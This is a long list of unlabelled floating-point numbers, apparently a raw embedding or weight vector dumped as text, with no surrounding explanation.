0.019558953121304512, 0.01580420508980751, 0.022542763501405716, 0.0037154871970415115, 0.01231357455253601, 0.005774888209998608, -0.003645888762548566, -0.004886168986558914, 0.0315513052046299, -0.008151942864060402, 0.013884001411497593, 0.0142908850684762, -0.019102102145552635, 0.012170808389782906, -0.0014044613344594836, -0.0021950285881757736, -0.018602419644594193, -0.012384957633912563, -0.017888590693473816, -0.0034959844779223204, 0.025183936581015587, -0.011264244094491005, 0.004343658220022917, -0.026554491370916367, -0.005492925178259611, 0.021657614037394524, -0.011756787076592445, 0.0016783938044682145, 0.018887951970100403, -0.012463479302823544, -0.025854937732219696, -0.01644665189087391, -0.0053537278436124325, -0.004689865745604038, 0.005935499910265207, 0.015161758288741112, -0.0028999359346926212, 0.008608794771134853, 0.009965072385966778, -0.02899579145014286, 0.021714720875024796, -0.009693817235529423, 0.006092542316764593, 0.017917143180966377, 0.0079520707949996, -0.01250630896538496, -0.023984702304005623, 0.016903504729270935, 0.006274569313973188, 0.04120229184627533, -0.004850477445870638, -0.0020897386129945517, -0.003954620566219091, 0.0005719566252082586, -0.01419808715581894, 0.01988731510937214, -0.0032407899852842093, -0.0071632880717515945, -0.016289610415697098, -0.007495219353586435, -0.023727722465991974, -0.008887188509106636, -0.004125939682126045, 0.0101506682112813, 0.021115103736519814, 0.019173484295606613, 0.01621822640299797, -0.0026161884889006615, 0.02265697717666626, -0.01210656389594078, -0.02074391208589077, 0.0061674946919083595, 0.005517908837646246, -0.013391458429396152, -0.008501720614731312, 0.0001833651913329959, 0.0026911406312137842, -0.032522112131118774, 0.026782916858792305, 0.0101506682112813, -0.002321733394637704, -0.016132567077875137, 0.035263221710920334, -0.013105926103889942, 0.004079540725797415, 0.01499043870717287, 0.00042049071635119617, 0.005642829462885857, 0.019873037934303284, 0.0008739961194805801, -0.008109113201498985, 0.013027405366301537, -0.008109113201498985, 0.022471381351351738, 0.0005692797712981701, -0.0004688973422162235, -0.0006143403006717563, 0.007488080766052008, -0.0015177818713709712, -0.02514110691845417, 0.000662077683955431, 0.003121223533526063, 0.014283746480941772, -0.0015151050174608827, 0.0027214784640818834, -0.004557806998491287, 0.016803568229079247, -0.02268552966415882, 0.005821287166327238, -0.005871254950761795, -0.014919055625796318, 0.0045435307547450066, 0.0017586996546015143, 0.004550668876618147, -0.013355767354369164, -0.010136391967535019, -0.016146844252943993, 0.03192249685525894, 0.013141618110239506, 0.00030293178861029446, 0.008480304852128029, 0.0034995535388588905, -0.011656850576400757, -0.004564945586025715, -0.0028124917298555374, 0.022257233038544655, 0.013841171748936176, 0.0035084765404462814, 0.0009984702337533236, 0.022699806839227676, 0.012570553459227085, 0.009308348409831524, -0.008851497434079647, -0.011114339344203472, 0.01800280250608921, -0.003317526774480939, 0.011528360657393932, 0.02806781232357025, -0.012463479302823544, 0.010279158130288124, 0.01263479795306921, -0.016104014590382576, -0.007809304632246494, 0.018373994156718254, -0.008344677276909351, 0.01193524431437254, 0.0014794134767726064, -0.003545952495187521, -0.009857998229563236, -0.013291521929204464, 0.009836583398282528, 0.011064371094107628, 0.0017390693537890911, -0.018059909343719482, 0.005528616718947887, -0.008951433002948761, -0.02309955283999443, 0.01231357455253601, 0.024198850616812706, -0.01698916405439377, -0.008187634870409966, -0.00975092314183712, 0.010400509461760521, -0.02459859661757946, -0.006306691560894251, -0.040231481194496155, -0.0047541107051074505, 0.005871254950761795, -0.005139579065144062, -0.009758061729371548, 0.0037369022611528635, 0.008615933358669281, -0.013469980098307133, 0.0015347354346886277, 0.0076094320975244045, 0.016132567077875137, -0.007887826301157475, -0.01815984584391117, 0.007852134294807911, -0.021557677537202835, -0.014298022724688053, 0.0035049072466790676, -0.008680177852511406, -0.017788654193282127, 0.006842064671218395, -0.007980624213814735, -0.028653152287006378, -0.01603263057768345, -0.015318800695240498, 0.011299935169517994, -0.033378709107637405, -0.01813129149377346, -0.007291777525097132, 0.0009003186132758856, 0.03275053948163986, 0.004086679313331842, 0.0033139577135443687, 0.011164307594299316, -0.0033782024402171373, 0.00007969247235450894, 0.00942969974130392, 0.001617718138732016, -0.021586231887340546, -0.008787252008914948, -0.02255704067647457, 0.003901083255186677, 0.010136391967535019, 0.011299935169517994, 0.016418099403381348, -0.0270256195217371, 0.013741235248744488, -0.00812339037656784, 0.0004929891438223422, 0.0037476096767932177, 0.0008133205119520426, -0.023684892803430557, -0.022856850177049637, 0.0034014019183814526, 0.0056035686284303665, -0.005503632593899965, -0.03409254178404808, -0.00003485500201350078, 0.011492669582366943, 0.028952961787581444, 0.004200892057269812, 0.03266488015651703, 0.00045328232226893306, -0.015061821788549423, 0.0001853728317655623, -0.0018033140804618597, 0.000936010095756501, 0.0032550666946917772, -0.010864499025046825, 0.016275333240628242, -0.006734990049153566, -0.004861184861510992, -0.006963415537029505, -0.004946844652295113, 0.02141491137444973, 0.011035817675292492, -0.0032461436931043863, -0.018602419644594193, -0.008665901608765125, -0.019459016621112823, -0.002769662067294121, -0.018759462982416153, 0.009022816084325314, 0.0031408537179231644, -0.0002299872285220772, 0.0032996810041368008, 0.007602293975651264, 0.0006803696160204709, -0.004165200516581535, -0.0020772465504705906, -0.00975092314183712, -0.006088973488658667, -0.007473804522305727, 0.0072418092750012875, -0.007830719463527203, -0.0174602922052145, 0.012120840139687061, 0.0007584448321722448, 0.007452389691025019, -0.004950413946062326, -0.007423836272209883, 0.011357042007148266, 0.015190310776233673, 0.028567492961883545, -0.02239999733865261, -0.0036244739312678576, -0.01577565260231495, 0.0063138301484286785, 0.0072560859844088554, -0.02017284743487835, 0.012734734453260899, -0.020529761910438538, -0.009722369723021984, 0.004779094364494085, 0.015261693857610226, 0.009001401253044605, 0.003922498319298029, 0.008137666620314121, 0.02017284743487835, 0.006188909523189068, 0.0013723389711230993, 0.01666080206632614, -0.0029623962473124266, -0.0024109622463583946, -0.004158061929047108, -0.022485658526420593, -0.009008539840579033, -0.007480942644178867, 0.01730324886739254, 0.020815294235944748, -0.012948883697390556, 0.024327339604496956, 0.021557677537202835, 0.011035817675292492, 0.010236328467726707, 0.015532949939370155, 0.005078903399407864, 0.026397448033094406, 0.016132567077875137, 0.013755512423813343, -0.028153471648693085, -0.0002679094613995403, -0.006763543002307415, 0.0040581258945167065, 0.009765200316905975, -0.015875589102506638, -0.012363542802631855, 0.0030676862224936485, -0.015375906601548195, 0.0022913955617696047, 0.012242191471159458, 0.004111662972718477, -0.007659400347620249, -0.006734990049153566, 0.013791203498840332, 0.007056213449686766, -0.0023663477040827274, 0.010893052443861961, -0.0013518163468688726, -0.00041312933899462223, -0.011100063100457191, 0.0011001911479979753, 0.018630973994731903, -0.016046907752752304, -0.0023128106258809566, 0.011771063320338726, 0.010885913856327534, -0.008772975765168667, 0.014162395149469376, 0.0006214785971678793, 0.00825187936425209, -0.0022681960836052895, -0.00990796647965908, -0.0012376034865155816, -0.013884001411497593, -0.002546590054407716, -0.028895854949951172, 0.0038047160487622023, 0.011399871669709682, 0.012784702703356743, 0.015418737195432186, 0.008087698370218277, -0.010186360217630863, -0.004450732376426458, -0.04045990854501724, -0.0015320584643632174, 0.011542637832462788, 0.013876862823963165, -0.0030837473459541798, 0.008301847614347935, 0.020344166085124016, 0.015004714950919151, -0.02940981276333332, 0.002102230442687869, 0.005881962366402149, -0.01676073856651783, -0.010736009106040001, 0.008772975765168667, 0.028110641986131668, 0.0031676224898546934, 0.01608973741531372, 0.0014785212697461247, -0.00002668498746061232, 0.007787889800965786, 0.0037154871970415115, -0.015004714950919151, 0.014662076719105244, 0.02552657574415207, -0.00981516856700182, -0.0027428932953625917, -0.007445251103490591, -0.011699680238962173, -0.0035138302482664585, 0.00666717579588294, -0.01618967391550541, -0.004154493100941181, -0.011606882326304913, 0.00006095442586229183, -0.025340979918837547, 0.006288846023380756, -0.005389419384300709, 0.01172823365777731, -0.014597832225263119, 0.011578328907489777, -0.0031801145523786545, 0.004001019522547722, -0.0012483109021559358, -0.006635053548961878, -0.006356659810990095, 0.00804486870765686, -0.0006959846359677613, 0.0124135110527277, 0.00235385587438941, -0.03514900803565979, 0.005942638032138348, -0.015033268369734287, 0.007288208696991205, 0.01606118492782116, -0.0028410449158400297, 0.00471484987065196, 0.034235306084156036, 0.008423198945820332, 0.012078010477125645, -0.0005014658672735095, 0.006845633499324322, -0.010000764392316341, 0.001993371406570077, 0.008173358626663685, 0.034463733434677124, -0.004846908617764711, -0.009536773897707462, 0.015261693857610226, 0.023727722465991974, -0.007823580875992775, -0.02475563809275627, -0.0005434033810161054, 0.022357167676091194, 0.0008989801863208413, -0.011870999820530415, 0.0004320904554333538, -0.002450222847983241, -0.00466845091432333, -0.009629571810364723, -0.00901567842811346, -0.013148755766451359, 0.02180038020014763, 0.016118289902806282, -0.025069724768400192, -0.003761886153370142, -0.04003160819411278, -0.02485557459294796, -0.008373230695724487, 0.0035156146623194218, 0.03946054354310036, 0.010414785705506802, 0.021843209862709045, 0.018373994156718254, 0.005028935149312019, 0.026454554870724678, 0.01262052170932293, -0.015347354114055634, 0.0034121093340218067, -0.014833396300673485, 0.01359133142977953, -0.020786741748452187, -0.010778838768601418, 0.04585646465420723, -0.0012991713592782617, 0.021657614037394524, -0.02297106198966503, -0.009522497653961182, -0.011721095070242882, 0.01857386715710163, -0.0051859780214726925, -0.03106589987874031, -0.010250604711472988, 0.023470744490623474, -0.01220650039613247, -0.02271408401429653, -0.007866411469876766, -0.018274057656526566, -0.014426512643694878, 0.01580420508980751, -0.011885276064276695, -0.007252517156302929, -0.0015097513096407056, -0.01870235614478588, 0.02125786989927292, -0.009786615148186684, 0.009693817235529423, -0.005846270825713873, 0.0033300188370049, -0.00014198533608578146, -0.00308731640689075, 0.00013919692719355226, -0.013041681610047817, 0.014647799544036388, -0.015261693857610226, 0.012641936540603638, 0.0053680045530200005, -0.016403822228312492, -0.008837220259010792, -0.0004974505864083767, -0.015718545764684677, 0.0263831727206707, -0.013177309185266495, -0.027668066322803497, -0.023656340315937996, 0.032864753156900406, 0.014919055625796318, 0.015361630357801914, 0.0024734223261475563, -0.002123645506799221, 0.01030771154910326, -0.037775903940200806, 0.002871382748708129, -0.010586105287075043, 0.023028168827295303, -0.0044899932108819485, -0.004104524850845337, 0.0005710643017664552, -0.0044899932108819485, 0.023627785965800285, -0.003661949886009097, 0.0017934988718479872, -0.005810579750686884, -0.01787431351840496, -0.002537667052820325, 0.024998340755701065, 0.00686704833060503, 0.0001652963546803221, 0.010578966699540615, -0.009722369723021984, 0.0001576003705849871, 0.0068777562119066715, 0.005989036988466978, -0.0063780746422708035, -0.014105289243161678, -0.007095474284142256, 0.008408921770751476, -0.008837220259010792, 0.021143656224012375, 0.015918418765068054, 0.001004716265015304, 0.0025912043638527393, -0.00012347035226412117, -0.0048040784895420074, 0.020115740597248077, 0.009743785485625267, 0.013955384492874146, 0.011428425088524818, 0.017031993716955185, -0.003335372544825077, 0.009087061509490013, -0.006763543002307415, -0.005835563410073519, -0.025954874232411385, 0.002630464965477586, -0.011892414651811123, 0.008987125009298325, 0.0010109622962772846, 0.014583555050194263, -0.002253919607028365, 0.02154340222477913, -0.007131165824830532, 0.002341363811865449, 0.002767877420410514, 0.01797425001859665, 0.009879413060843945, 0.0019398340955376625, 0.0033817715011537075, -0.0007727214251644909, 0.010900190100073814, -0.007209687028080225, 0.009458253160119057, 0.020958060398697853, -0.028853025287389755, 0.01045047678053379, -0.008680177852511406, -0.005553600378334522, -0.001712300698272884, 0.018616696819663048, -0.02801070548593998, 0.0011376672191545367, -0.0016391330864280462, -0.005824855994433165, -0.028096364811062813, -0.00865162443369627, 0.029838111251592636, 0.009857998229563236, -0.011228552088141441, -0.013013128191232681, -0.007695091888308525, -0.00011521668784553185, -0.0005451879696920514, 0.006238877773284912, 0.0009618864860385656, 0.016289610415697098, -0.006156787276268005, -0.0004461439966689795, -0.019830208271741867, -0.013634161092340946, -0.013348628766834736, -0.003790439572185278, -0.010607520118355751, 0.0015936263371258974, 0.029581131413578987, -0.0037261948455125093, -0.010693179443478584, 0.009072784334421158, 0.009472529403865337, 0.006467303726822138, 0.01733180321753025, 0.013427150435745716, -0.015204587951302528, 0.015604333020746708, 0.003672657534480095, -0.0071632880717515945, -0.006938431411981583, -0.0050253658555448055, 0.018459653481841087, -0.028596045449376106, 0.03871816024184227, 0.011978073976933956, -0.005674951709806919, -0.01379834208637476, -0.007423836272209883, 0.02214301936328411, -0.002805353607982397, 0.003324665129184723, -0.02431306429207325, -0.015418737195432186, 0.003312173066660762, -0.011835307814180851, 0.00013005097571294755, 0.0009895473485812545, 0.02071535773575306, 0.0007803058833815157, -0.009886550717055798, -0.01831688918173313, 0.0022896111477166414, 0.007923517376184464, 0.006185340695083141, 0.010122114792466164, 0.00011956659000134096, 0.027239767834544182, 0.01781720668077469, -0.028753088787198067, -0.0030177179723978043, 0.000634862924925983, -0.0031926066149026155, 0.0038332692347466946, 0.011199998669326305, -0.0029249200597405434, -0.017231866717338562, 0.00897284783422947, -0.006688591092824936, 0.004782663658261299, -0.011885276064276695, 0.010479030199348927, -0.009872274473309517, 0.006131803151220083, 0.011107200756669044, -0.001615933608263731, -0.005846270825713873, -0.011414147913455963, 0.014847672544419765, -0.015989800915122032, 0.0064958566799759865, 0.018916506320238113, 0.010657488368451595, 0.0059319306164979935, -0.008173358626663685, 0.0032925426494330168, -0.008694454096257687, 0.0038582533597946167, 0.013841171748936176, 0.0001245857129106298, -0.0022717653773725033, -0.02112938091158867, -0.001324155367910862, -0.0037190564908087254, 0.006463734433054924, 0.0016230718465521932, 0.006024728529155254, 0.010272019542753696, -0.003886806545779109, 0.00735245319083333, 0.004054556600749493, -0.014162395149469376, 0.0004894199664704502, 0.022043082863092422, 0.010907328687608242, -0.006924155168235302, 0.022728359326720238, 0.016004078090190887, -0.013855447992682457, 0.03266488015651703, 0.0009601018973626196, 0.009208411909639835, -0.019858762621879578, -0.004779094364494085, -0.0021825365256518126, 0.013805479742586613, -0.0051431478932499886, -0.0069420007057487965, -0.012556277215480804, 0.02855321578681469, -0.012777564115822315, 0.011435562744736671, 0.016803568229079247, -0.011378456838428974, 0.016104014590382576, 0.007141873240470886, -0.028781641274690628, -0.005407265387475491, -0.0028553216252475977, -0.0064815799705684185, 0.014961885288357735, -0.013163032941520214, -0.023470744490623474, 0.0029802420176565647, 0.0058141485787928104, -0.0027072017546743155, 0.0031801145523786545, -0.01574709825217724, 0.017117653042078018, 0.00021526448836084455, 0.012534862384200096, 0.000305608642520383, 0.010371956042945385, 0.005146717187017202, 0.029524026438593864, 0.006888463627547026, -0.007987761870026588, 0.0016828551888465881, 0.010771701112389565, 0.0007196302758529782, -0.013077372685074806, -0.00836609210819006, -0.0038511150050908327, -0.024541489779949188, -0.003563798265531659, 0.005475079175084829, 0.015475843101739883, 0.013741235248744488, 0.012806117534637451, -0.017931420356035233, -0.018431100994348526, -0.00796634703874588, 0.02125786989927292, -0.0027072017546743155, -0.003144423011690378, -0.003538814140483737, -0.018117016181349754, 0.027068449184298515, -0.005403696093708277, 0.01413384173065424, -0.00973664689809084, 0.00775933638215065, 0.014447927474975586, 0.011349903419613838, 0.022200126200914383, 0.01153549924492836, -0.012499170377850533, -0.005475079175084829, 0.027867939323186874, -0.023827658966183662, 0.009165582247078419, 0.004864754155278206, 0.0015704268589615822, -0.014804842881858349, -0.006595793180167675, -0.0003903759934473783, 0.009443975985050201, -0.011635435745120049, 0.0033782024402171373, -0.0034870614763349295, -0.012577692046761513, 0.010272019542753696, -0.01934480480849743, -0.011692541651427746, -0.019687442108988762, 0.004796940367668867, 0.010300572961568832, 0.008951433002948761, -0.025769278407096863, 0.012442064471542835, -0.00755946384742856, -0.0001202358107548207, 0.0011037603253498673, -0.012763287872076035, -0.005964052863419056, 0.006888463627547026, 0.0016792860114946961, -0.03217947483062744, 0.000021400970581453294, 0.028110641986131668, -0.01893078163266182, -0.005118164233863354, 0.025312425568699837, 0.004272275138646364, -0.019644612446427345, 0.005196685437113047, 0.014140980318188667, 0.009365455247461796, 0.007680815178900957, 0.011828170157968998, 0.012684766203165054, -0.0031604841351509094, -0.012956022284924984, -0.003124792594462633, -0.01774582453072071, -0.015975523740053177, 0.007077628280967474, 0.02896723710000515, -0.013077372685074806, -0.00001234564115293324, -0.013148755766451359, -0.00605328194797039, -0.009115613996982574, 0.0037369022611528635, -0.00812339037656784, 0.018245505169034004, -0.0005782026564702392, -0.013541363179683685, 0.002253919607028365, -0.018059909343719482, -0.0001993148325709626, -0.01330579910427332, 0.005132440477609634, -0.01637526974081993, -0.02619757689535618, -0.00912989117205143, -0.007124027702957392, 0.021215040236711502, -0.003440662520006299, 0.007780751679092646, -0.01371982041746378, 0.022828295826911926, 0.005253791809082031, 0.023699169978499413, -0.002878521103411913, -0.0007240917184390128, -0.010671764612197876, -0.00045863603008911014, -0.02852466329932213, 0.020144294947385788, 0.003876099130138755, -0.023113828152418137, 0.0027107710484415293, -0.0010368386283516884, -0.026426002383232117, -0.005757042206823826, -0.011813892982900143, -0.0006165709928609431, -0.005057488568127155, -0.03377845510840416, -0.00962243415415287, 0.01800280250608921, -0.014583555050194263, 0.013598469085991383, -0.005924792494624853, 0.01624678075313568, 0.01440509781241417, -0.0005996175459586084, 0.0034085402730852365, -0.027396811172366142, -0.006335244979709387, -0.027639513835310936, 0.012477755546569824, 0.002766092773526907, 0.006117526441812515, -0.014512171968817711, -0.038061436265707016, -0.03018075041472912, 0.018345441669225693, 0.04143071547150612, -0.027967875823378563, -0.014647799544036388, 0.009593880735337734, -0.016518035903573036, -0.01174250990152359, 0.012913191691040993, 0.0024948373902589083, 0.011228552088141441, 0.004743403289467096, -0.006649330258369446, 0.0030980240553617477, 0.007288208696991205, 0.0031854682601988316, 0.023442190140485764, 0.028253408148884773, -0.008822944015264511, 0.00018615358567330986, -0.015147481113672256, 0.02017284743487835, 0.007423836272209883, 0.009436838328838348, -0.0006736774230375886, 0.01650375872850418, -0.02001580409705639, -0.016703631728887558, 0.02873881161212921, -0.0006143403006717563, -0.007802166510373354, -0.014790565706789494, -0.017631610855460167, -0.005425110924988985, 0.007248947862535715, 0.0030302100349217653, -0.020401272922754288, -0.011906690895557404, 0.006631484720855951, -0.004729126580059528, -0.0048718927428126335, 0.009201274253427982, -0.003139069303870201, -0.0034210323356091976, 0.014076735824346542, -0.0240560844540596, 0.003876099130138755, -0.002544805407524109, 0.009279794991016388, -0.00015057359996717423, -0.013134479522705078, -0.02648310735821724, 0.008358954451978207, 0.007302484940737486, 0.02032989077270031, -0.001557934912852943, -0.013213001191616058, -0.001110006240196526, -0.013941108249127865, 0.007666538469493389, -0.010621796362102032, 0.0017131930217146873, 0.014604969881474972, -0.021714720875024796, 0.012727595865726471, 0.010521859861910343, 0.005014658439904451, -0.005457233637571335, -0.02144346572458744, 0.008387506939470768, -0.013555639423429966, 0.003794008633121848, 0.0006919693551026285, -0.010885913856327534, -0.01758878119289875, -0.03960331156849861, -0.0035745056811720133, -0.011128616519272327, -0.0002855321508832276, -0.012670489959418774, 0.019359080120921135, -0.015689993277192116, 0.01319158636033535, -0.009522497653961182, 0.00467558903619647, -0.008715868927538395, -0.006042574532330036, -0.012820393778383732, 0.003876099130138755, -0.01499043870717287, 0.008480304852128029, -0.027296874672174454, -0.008551687933504581, 0.013434288091957569, -0.030123643577098846, 0.02144346572458744, -0.017802929505705833, -0.015946971252560616, 0.02641172520816326, 0.004836201202124357, -0.02806781232357025, -0.00605328194797039, 0.004786232952028513, 0.002448438201099634, 0.011849584989249706, -0.019073547795414925, 0.0017453153850510716, 0.011428425088524818, 0.001980879344046116, -0.002221797127276659, 0.0053180367685854435, 0.007480942644178867, 0.012056595645844936, 0.01091446727514267, -0.0013580623781308532, -0.011920968070626259, 0.006021159701049328, 0.009179859422147274, -0.008137666620314121, -0.000427182880230248, 0.01691778004169464, -0.005257361102849245, 0.013748373836278915, 0.003553090849891305, -0.019873037934303284, 0.0014758444158360362, 0.008751560933887959, 0.0010216698283329606, 0.003876099130138755, 0.025769278407096863, -0.002211089711636305, -0.022028805688023567, -0.006024728529155254, 0.01653231307864189, 0.015033268369734287, 0.019144931808114052, -0.010593242943286896, 0.00018994581478182226, -0.001284002442844212, 0.006221032235771418, 0.004600637126713991, 0.007702230010181665, 0.031437091529369354, -0.004950413946062326, -0.02322804182767868, -0.0036101972218602896, -0.011000126600265503, 0.0059319306164979935, -0.0027571700047701597, 0.00755946384742856, 0.02358495630323887, -0.017774377018213272, 0.005639260169118643, 0.01229929830878973, 0.0006861694855615497, -0.009822306223213673, 0.014362268149852753, 0.016589418053627014, 0.0025198212824761868, -0.0038475459441542625, -0.0023485019337385893, 0.005535754840821028, -0.003460292937234044, 0.010107838548719883, -0.03683364763855934, 0.03811854496598244, 0.012135117314755917, -0.019030718132853508, -0.017645888030529022, 0.0034710003528743982, -0.0027375395875424147, -0.00946539081633091, 0.021357806399464607, 0.008401784114539623, -0.011107200756669044, -0.006056851241737604, -0.0009038877324201167, 0.0008195665432140231, -0.010200636461377144, 0.002336010104045272, 0.006663606967777014, -0.0001490120921516791, -0.006406628061085939, 0.011792478151619434, -0.013377182185649872, -0.012770426459610462, -0.006727851461619139, 0.005653536878526211, 0.010714594274759293, 0.004846908617764711, 0.01062893494963646, -0.02077246457338333, -0.023684892803430557, -0.006538686342537403, -0.013027405366301537, 0.007645123638212681, 0.007816443219780922, -0.011506945826113224, 0.009615295566618443, -0.03235079348087311, -0.006781389005482197, -0.0017381770303472877, 0.0038582533597946167, -0.016175396740436554, -0.008944295346736908, 0.016903504729270935, 0.022728359326720238, 0.017603058367967606, 0.016460929065942764, -0.011813892982900143, -0.027196938171982765, 0.02963823825120926, 0.01164971198886633, -0.003972466103732586, 0.0045934985391795635, -0.002227150835096836, 0.004211599472910166, -0.005335882306098938, -0.023570680990815163, 0.005343020427972078, 0.017488844692707062, -0.017246142029762268, 0.008480304852128029, -0.012270744889974594, -0.0000675350456731394, -0.0007642447017133236, -0.009265518747270107, 0.003701210720464587, -0.013884001411497593, 0.027967875823378563, 0.014547863975167274, -0.009843721054494381, 0.0054715098813176155, -0.0044114720076322556, 0.008872912265360355, 0.011321350000798702, 0.00045528996270149946, -0.01312734093517065, -0.004090248141437769, 0.01918776147067547, 0.0007432759157381952, -0.009822306223213673, 0.004682727623730898, 0.009965072385966778, 0.017517399042844772, -0.00010802261385833845, 0.007830719463527203, -0.007238240446895361, -0.013562778010964394, 0.0089228805154562, 0.00952963624149561, -0.010621796362102032, 0.024841297417879105, -0.004564945586025715, 0.013048820197582245, 0.015233141370117664, -0.01624678075313568, 0.012477755546569824, 0.015275971032679081, -0.02762523666024208, -0.003451369935646653, -0.01870235614478588, 0.0028695983346551657, 0.008880049921572208, -0.004879030864685774, -0.001331293722614646, -0.002364563290029764, 0.02100089006125927, -0.0007013384019955993, -0.0000034053334729833296, -0.020629698410630226, 0.0012474186951294541, 0.001401784480549395, 0.02170044369995594, 0.014976161532104015, 0.006249585188925266, 0.01381261833012104, -0.015590055845677853, 0.0016355639090761542, -0.01339859701693058, -0.0076879533007740974, 0.0002217335713794455, -0.003904652316123247, -0.011307073757052422, 0.01978737860918045, 0.0047112805768847466, -0.010578966699540615, 0.00393677456304431, -0.01686067506670952, -0.010314849205315113, 0.029866663739085197, -0.002136137569323182, -0.0023734860587865114, -0.013234416022896767, 0.003972466103732586, 0.00605328194797039, -0.011242829263210297, 0.016289610415697098, 0.00621389364823699, -0.009850859642028809, 0.02265697717666626, -0.0007129381410777569, 0.00941542349755764, -0.014512171968817711, -0.010136391967535019, 0.002079030964523554, -0.0044899932108819485, -0.010550413280725479, -0.017217589542269707, -0.023827658966183662, -0.019644612446427345, 0.010279158130288124, -0.00377259380184114, 0.01430516131222248, -0.010807392187416553, 0.01131421234458685, 0.01800280250608921, 0.007430974394083023, 0.015875589102506638, 0.0344066247344017, -0.005089610815048218, -0.004158061929047108, 0.005614276044070721, 0.0006353090866468847, -0.011835307814180851, 0.02529815025627613, -0.0070455060340464115, 0.01940190978348255, 0.0059176539070904255, -0.013627022504806519, -0.0006875079125165939, -0.014447927474975586, -0.019144931808114052, -0.01440509781241417, 0.029552578926086426, 0.010314849205315113, 0.001565073151141405, 0.012898915447294712, 0.010493307374417782, 0.0042936899699270725, -0.016275333240628242, -0.013348628766834736, -0.012599106878042221, 0.012177946977317333, -0.006685021799057722, -0.002350286580622196, -0.004354365635663271, -0.01717475987970829, -0.0203013364225626, 0.0005532185896299779, 0.007816443219780922, 0.0018077754648402333, 0.005621414631605148, -0.009979349561035633, 0.03452083840966225, 0.008437475189566612, -0.007409559562802315, -0.03026640973985195, 0.02338508330285549, 0.02118648588657379, 0.003861822420731187, -0.005046781152486801, -0.014148118905723095, -0.003021287266165018, 0.012956022284924984, 0.015261693857610226, -0.0030801782850176096, 0.032579220831394196, -0.004450732376426458, -0.011164307594299316, 0.00935117807239294, -0.006645760964602232, 0.004158061929047108, 0.023856211453676224, 0.007488080766052008, -0.02167189121246338, 0.017360355705022812, -0.013448565267026424, 0.013941108249127865, -0.0056463987566530704, -0.014283746480941772, 0.014119565486907959, 0.0027286168187856674, 0.016261056065559387, 0.05116736516356468, -0.02586921490728855, -0.008979986421763897, 0.030551942065358162, -0.018074186518788338, 0.0010377309517934918, 0.018088461831212044, 0.010029316879808903, 0.018188398331403732, -0.0048576160334050655, 0.0040438491851091385, 0.03183683753013611, 0.008416060358285904, 0.020386995747685432, 0.006492287386208773, -0.006278138607740402, -0.005642829462885857, 0.005557169672101736, -0.005960484035313129, -0.01440509781241417, -0.008665901608765125, -0.0013125556288287044, -0.008180496282875538, -0.016960609704256058, -0.04151637479662895, -0.010464753955602646, 0.043515101075172424, -0.03152275085449219, -0.013898277655243874, -0.009451114572584629, 0.022771190851926804, 0.022128742188215256, -0.023399360477924347, 0.015275971032679081, -0.009915104135870934, -0.014176672324538231, -0.005935499910265207, -0.0064316121861338615, 0.0036066281609237194, 0.009700954891741276, -0.010007902048528194, 0.010407647117972374, 0.008002039045095444, -0.0066279154270887375, 0.01727469637989998, 0.0030427020974457264, -0.00754518760368228, -0.029781004413962364, -0.028281960636377335, 0.0003995219594798982, 0.0001001593263936229, 0.010107838548719883, -0.00796634703874588, -0.01921631395816803, -0.004746972117573023, -0.013627022504806519, 0.003124792594462633, 0.004879030864685774, -0.003479923354461789, 0.013220138847827911, -0.005364435724914074, 0.0006089865928515792, -0.012813256122171879, 0.008680177852511406, 0.02007291093468666, 0.003690503304824233, -0.04568514600396156, 0.0051431478932499886, -0.017446015030145645, 0.022514211013913155, 0.00808055978268385, 0.002464499557390809, 0.009137028828263283, -0.012706181034445763, -0.04559948667883873, -0.016846397891640663, -0.007766474969685078, 0.011171446181833744, -0.01800280250608921, 0.019744548946619034, -0.0010564690455794334, 0.0022057360038161278, -0.011978073976933956, 0.019359080120921135, -0.008480304852128029, -0.02495551109313965, -0.0008418737561441958, 0.004532822873443365, 0.004893307574093342, -0.008109113201498985, 0.010386232286691666, -0.0315513052046299, -0.012270744889974594, -0.0008824728429317474, 0.0036119818687438965, 0.018117016181349754, 0.011157169006764889, 0.012285021133720875, 0.013741235248744488, 0.004397195298224688, -0.0040295724757015705, 0.006902739871293306, -0.01596124842762947, -0.007866411469876766, -0.025412362068891525, 0.010093562304973602, 0.011307073757052422, -0.0025037601590156555, 0.005949776619672775, -0.003765455447137356, 0.007480942644178867, 0.0108002545312047, -0.011000126600265503, -0.016004078090190887, -0.008473167195916176, 0.0029249200597405434, 0.005599999334663153, 0.0015159973409026861, -0.005428680218756199, -0.02584066055715084, -0.001979094697162509, -0.007209687028080225, -0.01279184129089117, 0.012449202127754688, 0.02284257300198078, -0.0196588896214962, -0.005667813587933779, 0.00605328194797039, -0.003886806545779109, -0.0030766089912503958, -0.020287061110138893, 0.004482855089008808, 0.00357272126711905, -0.01593269407749176, 0.015875589102506638, 0.0089228805154562, 0.008715868927538395, -0.0070883361622691154, -0.003661949886009097, 0.014719182625412941, 0.0010261312127113342, -0.013498532585799694, 0.007666538469493389, -0.0362054780125618, 0.0023681323509663343, 0.003690503304824233, -0.0000018403439980829717, 0.009172720834612846, 0.004486423917114735, -0.008037730120122433, -0.009179859422147274, -0.007566602434962988, 0.03654811531305313, 0.006931293290108442, -0.005978329572826624, 0.0003174314624629915, -0.011678265407681465, -0.03386411443352699, 0.0004746972117573023, 0.004457870963960886, 0.049082979559898376, -0.010300572961568832, 0.024655701592564583, -0.00188986596185714, -0.00873014610260725, -0.028667429462075233, -0.030894579365849495, -0.01753167435526848, -0.0019077117322012782, -0.00843033753335476, -0.022585595026612282, -0.006356659810990095, 0.009029954671859741, -0.005396557971835136, -0.00576061150059104, 0.012884639203548431, -0.010714594274759293, -0.0024038238916546106, -0.019901592284440994, -0.019459016621112823, 0.004861184861510992, 0.031408537179231644, 0.024198850616812706, -0.0018327595898881555, -0.003444231813773513, 0.00486832344904542, -0.0022717653773725033, 0.004597067832946777, -0.0019291266798973083, -0.012948883697390556, 0.024170298129320145, -0.010607520118355751, -0.00755232572555542, 0.0011617590207606554, -0.0030766089912503958, 0.02102944441139698, -0.014397959224879742, 0.020915230736136436, -0.0015008284244686365, -0.018916506320238113, 0.0030177179723978043, 0.0018166983500123024, -0.010193497873842716, -0.015375906601548195, -0.009686678647994995, 0.007381006609648466, -0.010236328467726707, 0.008908603340387344, 0.005225238390266895, 0.005425110924988985, 0.00932262558490038, -0.0011394517496228218, 0.0031640531960874796, -0.011299935169517994, 0.008194773457944393, -0.00755946384742856, 0.0043079666793346405, -0.034749265760183334, -0.03846118226647377, 0.006142510566860437, 0.0027179091703146696, -0.011085785925388336, 0.019516123458743095, -0.005789164453744888, -0.014126704074442387, 0.001324155367910862, 0.011264244094491005, -0.004918291699141264, 